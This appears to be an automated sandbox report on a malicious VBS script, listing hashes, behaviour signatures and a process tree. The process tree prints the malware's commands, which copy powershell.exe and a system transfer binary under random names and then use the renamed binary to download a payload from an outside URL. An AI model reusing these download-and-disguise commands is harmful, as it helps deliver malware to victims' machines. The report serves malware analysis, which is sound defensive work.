Analysis
-
max time kernel
4294180s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
24-03-2022 23:27
Static task
static1
Behavioral task
behavioral1
Sample
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
Resource
win7-20220311-en
General
-
Target
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
-
Size
6KB
-
MD5
d7c45aaa2ec4c379c3590e85efd3e27c
-
SHA1
182d0dd1d7e8c4797b70550c1fa26d20e691df37
-
SHA256
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c
-
SHA512
b832b5d84d581d7bc9282cdcce3752d8423e0967a786c9c54601c270e9743267d57c0de68c0e5c97f51af3d1be040b341dc04f50e12c3e6700eb11282910c217
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
ZAblYWBin.exepid process 1604 ZAblYWBin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 1616 wrote to memory of 1644 1616 WScript.exe cmd.exe PID 1616 wrote to memory of 1644 1616 WScript.exe cmd.exe PID 1616 wrote to memory of 1644 1616 WScript.exe cmd.exe PID 1644 wrote to memory of 1100 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 1100 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 1100 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 1392 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 1392 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 1392 1644 cmd.exe cmd.exe PID 1616 wrote to memory of 1604 1616 WScript.exe ZAblYWBin.exe PID 1616 wrote to memory of 1604 1616 WScript.exe ZAblYWBin.exe PID 1616 wrote to memory of 1604 1616 WScript.exe ZAblYWBin.exe PID 1616 wrote to memory of 1604 1616 WScript.exe ZAblYWBin.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe3⤵PID:1100
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe3⤵PID:1392
-
-
-
C:\ProgramData\ZAblYWBin.exe"C:\ProgramData\ZAblYWBin.exe" /transfer bHfBoa /download https://waybackwhenbycynthia.com/edikaso/09518900965/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg2⤵
- Executes dropped EXE
PID:1604
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
0920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51
-
MD5
0920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51